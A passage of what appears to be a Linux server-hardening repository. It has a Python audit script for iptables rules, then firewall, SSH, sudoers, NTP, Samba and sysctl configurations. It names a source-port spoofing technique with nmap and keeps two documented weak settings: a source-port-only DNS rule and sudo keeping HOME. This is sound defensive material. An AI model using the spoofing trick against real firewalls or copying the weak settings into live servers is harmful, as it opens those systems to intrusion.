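wrong. The script below is an added example (not part of this repository) of
the static check a reviewer would run over such a file: it parses the
``-A CHAIN ...`` lines and flags the INPUT rules worth questioning: chain
policies that are not DROP, ACCEPT rules with no restriction at all, rules that
match on a source port only (the client chooses its source port, so
``--sport 53`` alone is spoofable with ``nmap --source-port 53``), and wide
destination port ranges accepted without connection tracking. The embedded
sample is constructed: a subset of the server rules with the OUTPUT policy
weakened and two bad rules appended; the 1024-port threshold and the advice
strings are the example's own choices.

```python
"""Static audit of an iptables-restore rules file (added example)."""
import shlex

# Constructed sample: a subset of the server rules, with the OUTPUT policy
# weakened and two careless rules appended (--sport-only ACCEPT, bare ACCEPT).
SAMPLE_RULES = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate INVALID -j DROP
-A INPUT -p tcp -m tcp --dport 32768:61000 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p udp -m udp --sport 53 --dport 1024:65535 -j ACCEPT
-4 -A INPUT -p icmp -m icmp --icmp-type 8/0 -j ACCEPT
-6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 135/0 -j ACCEPT
-A INPUT -p tcp -m multiport --dports 22,80,443 -j ACCEPT
-A INPUT -p udp -m udp --sport 123 --dport 123 -j ACCEPT
-A INPUT -p tcp -m multiport --dports 139,445 -j DROP
-A INPUT -p udp -m udp --sport 67 -j ACCEPT
-A INPUT -j ACCEPT
-A INPUT -j REJECT
COMMIT
"""

# Arbitrary threshold for this example: a range wider than this, accepted
# without conntrack, is flagged.
WIDE_RANGE = 1024

ADVICE = {
    "policy-not-drop": "set the chain policy to DROP and accept explicitly",
    "unrestricted-accept": "restrict by interface, protocol/port or conntrack state",
    "source-port-only": "the peer picks its source port (nmap --source-port); match --dport or --ctstate",
    "wide-dport-range": "add -m conntrack --ctstate ESTABLISHED,RELATED or narrow the range",
}


def parse_rules(text):
    """Return (policies, rules) from iptables-restore syntax.

    Each rule is a dict with the address family (-4/-6/any), the chain, the
    options as a flag -> value mapping (True for valueless flags) and the line.
    """
    policies, rules = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#*" or line == "COMMIT":
            continue
        if line.startswith(":"):                 # ":CHAIN POLICY [pkts:bytes]"
            chain, policy = line[1:].split()[:2]
            policies[chain] = policy
            continue
        tok = shlex.split(line)
        family = tok.pop(0) if tok[0] in ("-4", "-6") else "any"
        if len(tok) < 2 or tok[0] != "-A":
            continue
        opts, i = {}, 2
        while i < len(tok):
            key = tok[i]
            if key == "!" and i + 1 < len(tok):  # negated match such as "! --syn"
                key, i = "!" + tok[i + 1], i + 1
            if not key.startswith("-"):          # stray value (e.g. second --tcp-flags arg)
                i += 1
                continue
            has_value = i + 1 < len(tok) and not tok[i + 1].startswith("-") and tok[i + 1] != "!"
            opts[key] = tok[i + 1] if has_value else True
            i += 2 if has_value else 1
        rules.append({"family": family, "chain": tok[1], "opts": opts, "line": line})
    return policies, rules


def port_span(spec):
    """Number of ports covered by '22', '22,80,443' or '1024:65535'."""
    total = 0
    for part in spec.split(","):
        low, _, high = part.partition(":")
        total += (int(high) - int(low) + 1) if high else 1
    return total


def audit(text):
    """Return [(kind, detail)] findings for the policies and the INPUT ACCEPT rules."""
    policies, rules = parse_rules(text)
    findings = []
    for chain in ("INPUT", "FORWARD", "OUTPUT"):
        if policies.get(chain) != "DROP":
            findings.append(("policy-not-drop", f"{chain} {policies.get(chain)}"))
    for rule in rules:
        o = rule["opts"]
        if rule["chain"] != "INPUT" or o.get("-j") != "ACCEPT":
            continue
        # Loopback, stateful matches and ICMP/IGMP control traffic are the
        # accepted baseline of the rule files on this page.
        if o.get("-i") == "lo" or "--ctstate" in o or o.get("-p") in ("icmp", "ipv6-icmp", "igmp"):
            continue
        dports = o.get("--dport") or o.get("--dports")
        if dports is None:
            kind = "source-port-only" if "--sport" in o else "unrestricted-accept"
            findings.append((kind, rule["line"]))
        elif port_span(dports) > WIDE_RANGE:
            findings.append(("wide-dport-range", rule["line"]))
    return findings


def report(text):
    """Human-readable findings with the matching advice."""
    return [f"{kind}: {detail}\n    -> {ADVICE[kind]}" for kind, detail in audit(text)]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_RULES)))
```

Run against the server rules of this page, the only hit besides the sample's
deliberate mistakes is the DNS rule (``--sport 53 --dport 1024:65535``), which
the comment above it justifies; the audit makes that trade-off visible rather
than hiding it.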


*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]

# IPv6: Disable processing of any RH0 packet to prevent ping-pong
-6 -A INPUT -m rt --rt-type 0 -j DROP
-6 -A FORWARD -m rt --rt-type 0 -j DROP
-6 -A OUTPUT -m rt --rt-type 0 -j DROP

##############################################################################
# INPUT filters

# Trust local loopback
-A INPUT -i lo -j ACCEPT

# Drop invalid packets
-A INPUT -m conntrack --ctstate INVALID -j DROP

# port range is in /proc/sys/net/ipv4/ip_local_port_range
# If conntrack is not available (old kernel), use -m state --state instead
-A INPUT -p tcp -m tcp --dport 32768:61000 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p udp -m udp --dport 32768:61000 -m conntrack --ctstate ESTABLISHED -j ACCEPT
# Most DNS resolvers (BIND, PowerDNS, ...) use their own port numbers.
# Caveat: this rule matches on the source port only, so any UDP packet sent
# from port 53 to a high port is accepted without connection tracking.
-A INPUT -p udp -m udp --sport 53 --dport 1024:65535 -j ACCEPT

# If conntrack module is not available, state module doesn't work well for IPv6
# so use these rules instead
#-6 -A INPUT -p tcp -m tcp --dport 32768:61000 ! --syn -j ACCEPT
--syn -j ACCEPT 34 | #-6 -A INPUT -p udp -m udp --dport 32768:61000 -j ACCEPT 35 | 36 | 37 | # ICMPv4 echo reply, dest unreachable, echo request, time exceeded, parameter problem 38 | -4 -A INPUT -p icmp -m icmp --icmp-type 0/0 -j ACCEPT 39 | -4 -A INPUT -p icmp -m icmp --icmp-type 3 -j ACCEPT 40 | -4 -A INPUT -p icmp -m icmp --icmp-type 8/0 -j ACCEPT 41 | -4 -A INPUT -p icmp -m icmp --icmp-type 11 -j ACCEPT 42 | -4 -A INPUT -p icmp -m icmp --icmp-type 12 -j ACCEPT 43 | 44 | # ICMPv6 dest unreachable, packet too big, time exceeded, parameter problem 45 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 1 -j ACCEPT 46 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 2 -j ACCEPT 47 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 3 -j ACCEPT 48 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 4 -j ACCEPT 49 | # ICMPv6 echo request, echo reply 50 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 128/0 -j ACCEPT 51 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 129/0 -j ACCEPT 52 | # Neighbor Discovery Protocol: RS, RA, NS, NA 53 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 133/0 -j ACCEPT 54 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 134/0 -j ACCEPT 55 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 135/0 -j ACCEPT 56 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 136/0 -j ACCEPT 57 | 58 | 59 | # Accept SSH, HTTP and HTTPS 60 | -A INPUT -p tcp -m multiport --dports 22,80,443 -j ACCEPT 61 | 62 | # Accept SMTP, IMAP, SMTPS, IMAPS 63 | -A INPUT -p tcp -m multiport --dports 25,143,587,993 -j ACCEPT 64 | 65 | # Accept NTP 66 | -A INPUT -p udp -m udp --sport 123 --dport 123 -j ACCEPT 67 | 68 | # Silently drop NetBios 69 | -A INPUT -p tcp -m multiport --dports 139,445 -j DROP 70 | -A INPUT -p udp -m udp --dport 137:138 -j DROP 71 | 72 | # Silently drop unsollicited broadcast and multicast 73 | -A INPUT -m pkttype --pkt-type broadcast -j DROP 74 | -A INPUT -m pkttype --pkt-type multicast -j DROP 75 | # This rule is still here to really avoid rejecting an 
IPv4 broadcast 76 | -4 -A INPUT -d 255.255.255.255/32 -j DROP 77 | 78 | # Log to NetFilter, so that logs don't fills up and debugging is quick 79 | #-A INPUT -m limit --limit 1/sec --limit-burst 1000 -j LOG --log-prefix "[IN DROP] " 80 | -A INPUT -m limit --limit 1/sec --limit-burst 1000 -j NFLOG 81 | 82 | # Reject packet, with some stats in iptables -nvL and ip6tables -nvL 83 | -A INPUT -p tcp -j REJECT --reject-with tcp-reset 84 | -4 -A INPUT -p udp -j REJECT --reject-with icmp-port-unreachable 85 | -6 -A INPUT -p udp -j REJECT --reject-with icmp6-port-unreachable 86 | -4 -A INPUT -p icmp -j DROP 87 | -6 -A INPUT -p ipv6-icmp -j DROP 88 | -4 -A INPUT -j REJECT --reject-with icmp-proto-unreachable 89 | -6 -A INPUT -j REJECT 90 | 91 | 92 | ############################################################################## 93 | # OUTPUT filters 94 | 95 | # These filters respect the symmetry of INPUT filters 96 | 97 | -A OUTPUT -o lo -j ACCEPT 98 | -4 -A OUTPUT -p icmp -j ACCEPT 99 | -6 -A OUTPUT -p ipv6-icmp -j ACCEPT 100 | 101 | # Accept TCP reset and FIN+ACK 102 | -A OUTPUT -p tcp -m tcp --tcp-flags RST RST -j ACCEPT 103 | -A OUTPUT -p tcp -m tcp --tcp-flags FIN,ACK FIN,ACK -j ACCEPT 104 | 105 | -4 -A OUTPUT -d 255.255.255.255/32 -j DROP 106 | -4 -A OUTPUT -m conntrack --ctstate INVALID -j DROP 107 | 108 | -A OUTPUT -p tcp -m tcp --sport 32768:61000 -j ACCEPT 109 | -A OUTPUT -p udp -m udp --sport 32768:61000 -j ACCEPT 110 | -A OUTPUT -p udp -m udp --sport 1024:65535 --dport 53 -j ACCEPT 111 | 112 | -A OUTPUT -p tcp -m multiport --sports 22,80,443 -j ACCEPT 113 | -A OUTPUT -p tcp -m multiport --sports 25,143,587,993 -j ACCEPT 114 | -A OUTPUT -p udp -m udp --sport 123 --dport 123 -j ACCEPT 115 | 116 | #-A OUTPUT -m limit --limit 1/sec --limit-burst 1000 -j LOG --log-prefix "[OUT DROP] " 117 | -A OUTPUT -m limit --limit 1/sec --limit-burst 1000 -j NFLOG 118 | 119 | # Reject other packets, with some stats in iptables -nvL and ip6tables -nvL 120 | -A OUTPUT -p tcp -j REJECT 
--reject-with tcp-reset 121 | -4 -A OUTPUT -p udp -j REJECT --reject-with icmp-port-unreachable 122 | -6 -A OUTPUT -p udp -j REJECT --reject-with icmp6-port-unreachable 123 | -4 -A OUTPUT -j REJECT --reject-with icmp-proto-unreachable 124 | -6 -A OUTPUT -j REJECT 125 | 126 | COMMIT 127 | -------------------------------------------------------------------------------- /etc/nftables-server.conf: -------------------------------------------------------------------------------- 1 | #!/usr/bin/nft -f 2 | # Example of /etc/nftables.conf content for a server 3 | # 4 | # Reference table: 5 | # https://wiki.nftables.org/wiki-nftables/index.php/Quick_reference-nftables_in_10_minutes 6 | 7 | flush ruleset 8 | 9 | table inet filter { 10 | set SSH_IPv4_clients { 11 | type ipv4_addr 12 | elements = { 192.168.0.1 } 13 | } 14 | set SSH_IPv6_clients { 15 | type ipv6_addr 16 | elements = { fe80::1 } 17 | } 18 | chain input { 19 | type filter hook input priority 0; policy accept; 20 | rt type 0 counter drop comment "disable processing of any RH0 packet to prevent ping-pong" 21 | iifname "lo" accept comment "trust local loopback" 22 | ct state { established, related} counter accept comment "accept established connections" 23 | ct state invalid counter drop comment "drop invalid connections" 24 | 25 | ip protocol icmp icmp type 0 icmp code 0 counter accept comment "accept ICMPv4 echo reply" 26 | ip protocol icmp icmp type 3 counter accept comment "accept ICMPv4 dest unreachable" 27 | ip protocol icmp icmp type 8 icmp code 0 counter accept comment "accept ICMPv4 echo request" 28 | ip protocol icmp icmp type 11 counter accept comment "accept ICMPv4 time exceeded" 29 | ip protocol icmp icmp type 12 counter accept comment "accept ICMPv4 parameter problem" 30 | 31 | ip6 nexthdr ipv6-icmp icmpv6 type 1 counter accept comment "accept ICMPv6 dest unreachable" 32 | ip6 nexthdr ipv6-icmp icmpv6 type 2 counter accept comment "accept ICMPv6 packet too big" 33 | ip6 nexthdr ipv6-icmp icmpv6 type 3 
counter accept comment "accept ICMPv6 time exceeded" 34 | ip6 nexthdr ipv6-icmp icmpv6 type 4 counter accept comment "accept ICMPv6 parameter problem" 35 | ip6 nexthdr ipv6-icmp icmpv6 type 128 icmpv6 code 0 counter accept comment "accept ICMPv6 echo request" 36 | ip6 nexthdr ipv6-icmp icmpv6 type 129 icmpv6 code 0 counter accept comment "accept ICMPv6 echo reply" 37 | ip6 nexthdr ipv6-icmp icmpv6 type 133 icmpv6 code 0 counter accept comment "accept ICMPv6 router solicitation" 38 | ip6 nexthdr ipv6-icmp icmpv6 type 134 icmpv6 code 0 counter accept comment "accept ICMPv6 router advertisement" 39 | ip6 nexthdr ipv6-icmp icmpv6 type 135 icmpv6 code 0 counter accept comment "accept ICMPv6 neighbor solicitation" 40 | ip6 nexthdr ipv6-icmp icmpv6 type 136 icmpv6 code 0 counter accept comment "accept ICMPv6 neighbor advertisement" 41 | 42 | #tcp dport 22 counter accept comment "accept SSH" 43 | ip saddr @SSH_IPv4_clients tcp dport 22 counter accept comment "accept SSH from trusted IPv4 clients" 44 | ip6 saddr @SSH_IPv6_clients tcp dport 22 counter accept comment "accept SSH from trusted IPv6 clients" 45 | tcp dport { 80, 443} counter accept comment "accept HTTP and HTTPS" 46 | #tcp dport { 25, 143, 587, 993} counter accept comment "accept SMTP, IMAP, SMTPS, IMAPS" 47 | udp sport 123 udp dport 123 counter accept comment "accept NTP" 48 | 49 | tcp dport { 139, 445} counter drop comment "silently drop NetBios" 50 | udp dport { 137, 138} counter drop comment "silently drop NetBios" 51 | 52 | meta pkttype broadcast counter drop comment "silently drop unsollicited broadcast" 53 | meta pkttype multicast counter drop comment "silently drop unsollicited multicast" 54 | ip daddr 255.255.255.255/32 counter drop comment "really drop unsollicited IPv4 broadcast" 55 | 56 | # Log to NetFilter, so that logs don't fills up and debugging is quick 57 | #limit rate 1/second log prefix "[IN DROP] " comment "log to kernel logs" 58 | counter limit rate 10/second log prefix "[IN DROP] " group 0 
comment "log to NFLOG" 59 | ip protocol tcp counter reject with tcp reset comment "reject IPv4 TCP input with TCP RST" 60 | ip6 nexthdr tcp counter reject with tcp reset comment "reject IPv6 TCP input with TCP RST" 61 | ip protocol udp counter reject with icmp type port-unreachable comment "reject IPv4 UDP input with ICMP port unreachable" 62 | ip6 nexthdr udp counter reject with icmpv6 type port-unreachable comment "reject IPv6 UDP input with ICMPv6 port unreachable" 63 | ip protocol icmp counter drop comment "drop IPv4 ICMP input" 64 | ip6 nexthdr icmpv6 counter drop comment "drop IPv6 ICMPv6 input" 65 | counter reject with icmp type prot-unreachable comment "reject unknown IPv4 protocol with ICMP protocol unreachable" 66 | counter reject with icmpx type port-unreachable comment "reject everything remaining with ICMP port unreachable" 67 | } 68 | 69 | chain prerouting { 70 | type filter hook prerouting priority 0; policy accept; 71 | # Requires Linux >= 4.10 and nft >= 0.7 72 | fib saddr . 
iif oif eq 0 counter drop comment "implement Reverse Path filtering" 73 | } 74 | 75 | chain forward { 76 | type filter hook forward priority 0; policy drop; 77 | rt type 0 counter drop comment "disable processing of any RH0 packet to prevent ping-pong" 78 | drop 79 | } 80 | 81 | chain output { 82 | type filter hook output priority 0; policy accept; 83 | rt type 0 counter drop comment "disable processing of any RH0 packet to prevent ping-pong" 84 | oifname "lo" accept comment "trust local loopback" 85 | ip protocol icmp counter accept comment "accept sending ICMPv4" 86 | ip6 nexthdr ipv6-icmp counter accept comment "accept sending ICMPv6" 87 | tcp flags rst counter accept comment "accept sending TCP RST" 88 | tcp flags & (fin|ack) == fin|ack counter accept comment "accept sending TCP FIN+ACK" 89 | 90 | ip daddr 255.255.255.255/32 counter drop comment "do not emit IPv4 broadcast" 91 | ct state invalid counter drop comment "drop invalid connections" 92 | tcp sport { 1024-65535} counter accept comment "accept TCP client" 93 | udp sport { 1024-65535} counter accept comment "accept UDP client" 94 | 95 | tcp sport 22 counter accept comment "accept SSH" 96 | tcp sport { 80, 443} counter accept comment "accept HTTP and HTTPS" 97 | #tcp sport { 25, 143, 587, 993} counter accept comment "accept SMTP, IMAP, SMTPS, IMAPS" 98 | udp sport 123 udp dport 123 counter accept comment "accept NTP" 99 | 100 | counter limit rate 10/second log prefix "[OUT DROP] " group 0 comment "log to NFLOG" 101 | counter reject 102 | } 103 | } 104 | -------------------------------------------------------------------------------- /etc/ntp.conf: -------------------------------------------------------------------------------- 1 | # /etc/ntp.conf, configuration for ntpd; see ntp.conf(5) for help 2 | 3 | # Location of drift file 4 | driftfile /var/lib/ntp/ntp.drift 5 | 6 | 7 | # Enable this if you want statistics to be logged. 
#statsdir /var/log/ntpstats/

statistics loopstats peerstats clockstats
filegen loopstats file loopstats type day enable
filegen peerstats file peerstats type day enable
filegen clockstats file clockstats type day enable


# You do need to talk to an NTP server or two (or three).
#server ntp.your-provider.example

# pool.ntp.org maps to about 1000 low-stratum NTP servers. Your server will
# pick a different set every time it starts up. Please consider joining the
# pool:
#
# You may change these names with your distribution (*.debian.pool.ntp.org) or
# your country (*.fr.pool.ntp.org)
server 0.pool.ntp.org iburst
server 1.pool.ntp.org iburst
server 2.pool.ntp.org iburst
server 3.pool.ntp.org iburst


# Access control configuration
# The web page
# might be helpful.
#
# Note that "restrict" applies to both servers and clients, so a configuration
# that might be intended to block requests from certain clients could also end
# up blocking replies from your own upstream servers.

# By default, exchange time with everybody, but don't allow configuration.
restrict -4 default kod notrap nomodify nopeer noquery
restrict -6 default kod notrap nomodify nopeer noquery

# Local users may interrogate the ntp server more closely.
restrict 127.0.0.1
restrict ::1
--------------------------------------------------------------------------------
/etc/resolv.conf:
--------------------------------------------------------------------------------
# Use Google public DNS servers when nothing else is available.
# google-public-dns-a.google.com. = 8.8.8.8 and 2001:4860:4860::8888
# google-public-dns-b.google.com. = 8.8.4.4 and 2001:4860:4860::8844
nameserver 8.8.8.8
nameserver 8.8.4.4

# OpenDNS resolvers
# http://www.opendns.com/opendns-ip-addresses/
nameserver 208.67.222.222
nameserver 208.67.220.220
--------------------------------------------------------------------------------
/etc/samba/smb.conf:
--------------------------------------------------------------------------------
# Configuration file for Samba client (smbclient, gvfs-smb, etc.) and server.
# This file is either in /etc/samba/smb.conf or /usr/local/samba/lib/smb.conf.
#
# Documentation:
# - https://www.samba.org/samba/docs/Samba-HOWTO-Collection.pdf
[global]
    # Workgroup or NT domain name that the Samba server is part of
    workgroup = WORKGROUP

    # NetBIOS name (the hostname, by default)
    netbios name = MyName

    # server string is the equivalent of the NT Description field
    server string = Samba Server

    # Be compatible with recent Microsoft Servers which disabled SMBv1
    client max protocol = SMB3

    # Security mode (share, user, server, domain or ads)
    security = user

    # Restrict connections to machines on the local network and loopback
    hosts allow = 10. 172.16. 192.168. 127.

# For a share that allows file upload, uncomment these lines
;[share]
;    comment = Share for upload
;    path = /srv/samba
;    public = yes
;    writable = yes
;    printable = no
;    create mask = 0770
--------------------------------------------------------------------------------
/etc/ssh/sshd_config:
--------------------------------------------------------------------------------
# Here is a general configuration file for an SSH server
# Verify the applied configuration with: sshd -T

# Authentication mechanisms: allow public key, disable password access
PubkeyAuthentication yes
PasswordAuthentication no

# Some other config values
PermitRootLogin no
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding no
UseDNS yes
PermitTunnel no

# Restrict allowed users
#AllowUsers user
#AllowGroups adm sudo wheel

# This configuration jails users in the sftpusers group so that they can only use sftp.
# Their home directory must belong to root, otherwise sshd complains with:
# fatal: bad ownership or modes for chroot directory "/home/user"
# Documentation: https://wiki.archlinux.org/index.php/SFTP_chroot
Subsystem sftp internal-sftp
Match Group sftpusers
    ChrootDirectory /home/%u
    ForceCommand internal-sftp
    AllowTcpForwarding no
    X11Forwarding no
--------------------------------------------------------------------------------
/etc/ssh/sshd_config.default:
--------------------------------------------------------------------------------
# $OpenBSD: sshd_config,v 1.89 2013/02/06 00:20:42 dtucker Exp $

# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

# The default requires explicit activation of protocol 1
#Protocol 2

# HostKey for protocol version 1
#HostKey /etc/ssh/ssh_host_key
# HostKeys for protocol version 2
#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_dsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key

# Lifetime and size of ephemeral version 1 server key
#KeyRegenerationInterval 1h
#ServerKeyBits 1024

# Logging
# obsoletes QuietMode and FascistLogging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
#PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#RSAAuthentication yes
#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile .ssh/authorized_keys

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#RhostsRSAAuthentication no
# similar for protocol version 2
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# RhostsRSAAuthentication and HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to no to disable s/key passwords
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
PrintMotd no # pam does that
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
UsePrivilegeSeparation sandbox # Default for new installations.
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS yes
#PidFile /run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# override default of no subsystems
Subsystem sftp /usr/lib/ssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#    X11Forwarding no
#    AllowTcpForwarding no
#    ForceCommand cvs server
--------------------------------------------------------------------------------
/etc/sudoers:
--------------------------------------------------------------------------------
## sudoers file.
##
## This file MUST be edited with the 'visudo' command as root.
## Failure to use 'visudo' may result in syntax or file permission errors
## that prevent sudo from running.
##
## See the sudoers man page for the details on how to write a sudoers file.
##

##
## Host alias specification
##
## Groups of machines. These may include host names (optionally with wildcards),
## IP addresses, network numbers or netgroups.
# Host_Alias WEBSERVERS = www1, www2, www3

##
## User alias specification
##
## Groups of users. These may consist of user names, uids, Unix groups,
## or netgroups.
# User_Alias ADMINS = millert, dowdy, mikef

##
## Cmnd alias specification
##
## Groups of commands. Often used to group related commands together.
# Cmnd_Alias PROCESSES = /usr/bin/nice, /bin/kill, /usr/bin/renice, \
#   /usr/bin/pkill, /usr/bin/top

##
## Defaults specification
##
## You may wish to keep some of the following environment variables
## when running commands via sudo.
##
## Locale settings
# Defaults env_keep += "LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET"
##
## Run X applications through sudo; HOME is used to find the
## .Xauthority file. Note that other programs use HOME to find
## configuration files and this may lead to privilege escalation!
# Defaults env_keep += "HOME"
Defaults env_keep += "HOME"
##
## X11 resource path settings
# Defaults env_keep += "XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH"
##
## Desktop path settings
# Defaults env_keep += "QTDIR KDEDIR"
##
## Allow sudo-run commands to inherit the callers' ConsoleKit session
# Defaults env_keep += "XDG_SESSION_COOKIE"
##
## Uncomment to enable special input methods. Care should be taken as
## this may allow users to subvert the command being run via sudo.
# Defaults env_keep += "XMODIFIERS GTK_IM_MODULE QT_IM_MODULE QT_IM_SWITCHER"
### Keep Proxy
Defaults env_keep += "http_proxy https_proxy ftp_proxy all_proxy no_proxy"
##
## Uncomment to enable logging of a command's output, except for
## sudoreplay and reboot. Use sudoreplay to play back logged sessions.
# Defaults log_output
# Defaults!/usr/bin/sudoreplay !log_output
# Defaults!/usr/local/bin/sudoreplay !log_output
# Defaults!REBOOT !log_output
##
## Override built-in defaults
##
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Defaults env_reset, env_keep += "HOME SSH_CLIENT SSH_CONNECTION SSH_TTY"
Defaults editor=/usr/bin/vim, !env_editor
Defaults mail_badpass, mail_no_user, mail_no_host, mail_no_perms, mailto=root
Defaults insults, runas_default=root, timestamp_timeout=1
Defaults requiretty, use_pty, ignore_dot
# Use root or user password
Defaults rootpw, passprompt="Password for root@%h:"
#Defaults passprompt="Password for %u@%h:"

##
## Runas alias specification
##

##
## User privilege specification
##
root ALL=(ALL) ALL

## Uncomment to allow members of group wheel to execute any command
%wheel ALL=(ALL) ALL

## Same thing without a password
# %wheel ALL=(ALL) NOPASSWD: ALL

## Uncomment to allow members of group sudo to execute any command
# %sudo ALL=(ALL) ALL

## Uncomment to allow any user to run sudo if they know the password
## of the user they are running the command as (root by default).
# Defaults targetpw  # Ask for the password of the target user
# ALL ALL=(ALL) ALL  # WARNING: only use this together with 'Defaults targetpw'

## Read drop-in files from /etc/sudoers.d
## (the '#' here does not indicate a comment)
#includedir /etc/sudoers.d
--------------------------------------------------------------------------------
/etc/sysctl.conf:
--------------------------------------------------------------------------------
# /etc/sysctl.conf - Configuration file for setting system variables
# See /etc/sysctl.d/ for additional system variables.
# See sysctl.conf (5) for information.
#
# Documentation:
# * https://www.kernel.org/doc/Documentation/sysctl/
# * https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt


###################################################################
# Basic system settings
#

# Stop low-level messages on console (default 4 4 1 4)
#kernel.printk = 3 4 1 3

# Tweak how the flow of kernel messages is throttled.
#kernel.printk_ratelimit_burst = 10
#kernel.printk_ratelimit = 5

# Have the CD-ROM close when you use it, and open when you are done
#dev.cdrom.autoclose = 1
#dev.cdrom.autoeject = 1

# Reboot 600 seconds after kernel panic or oops.
#kernel.panic_on_oops = 1
#kernel.panic = 600


###################################################################
# Performance settings
#

# Increase TCP max buffer size settable using setsockopt (default 6291456)
#net.ipv4.tcp_rmem = 4096 87380 8388608
#net.ipv4.tcp_wmem = 4096 87380 8388608

# Increase auto tuning TCP buffer limits (default 212992 212992 1000 1)
#net.core.rmem_max = 8388608
#net.core.wmem_max = 8388608
#net.core.netdev_max_backlog = 5000
#net.ipv4.tcp_window_scaling = 1

# Disable laptop mode
#vm.laptop_mode = 0

# Control swap usage (low = less aggressive swapping)
#vm.swappiness = 60

# Some disk syncing parameters
#vm.dirty_background_ratio = 10
#vm.dirty_ratio = 40
#vm.vfs_cache_pressure = 100


###################################################################
# Network security
#

# Enable Reverse Path filter (spoof protection) in all interfaces
net.ipv4.conf.default.rp_filter = 1
net.ipv4.conf.all.rp_filter = 1

# Enable TCP/IP SYN cookies for IPv4 and IPv6
# See http://lwn.net/Articles/277146/
net.ipv4.tcp_syncookies = 1

# Don't reply to broadcast/multicast ping
net.ipv4.icmp_echo_ignore_broadcasts = 1

# Do not accept ICMP redirects (prevent MITM attacks)
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv6.conf.default.accept_redirects = 0
net.ipv6.conf.all.accept_redirects = 0

# Do not accept ICMP redirects from gateways listed in default gateway list
net.ipv4.conf.default.secure_redirects = 0
net.ipv4.conf.all.secure_redirects = 0

# Do not accept IP source route packets
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.all.accept_source_route = 0
net.ipv6.conf.default.accept_source_route = 0
net.ipv6.conf.all.accept_source_route = 0

# Use IPv6 temporary addresses and prefer them over public addresses
net.ipv6.conf.default.use_tempaddr = 2
net.ipv6.conf.all.use_tempaddr = 2

# Log Martian Packets (disabled)
#net.ipv4.conf.all.log_martians = 1

# Tweak the port range used for outgoing connections over IPv4 and IPv6
#net.ipv4.ip_local_port_range = 32768 61000


###################################################################
# Non-router network configuration (change these options on a router)
#

# Disable packet forwarding
net.ipv4.ip_forward = 0
net.ipv6.conf.default.forwarding = 0
net.ipv6.conf.all.forwarding = 0

# Do not send ICMP redirects
net.ipv4.conf.default.send_redirects = 0
net.ipv4.conf.all.send_redirects = 0


###################################################################
# System security settings

# Restrict dmesg
kernel.dmesg_restrict = 1

# Nullify kernel pointers in messages
kernel.kptr_restrict = 2

# Enable ASLR for everything in process memory
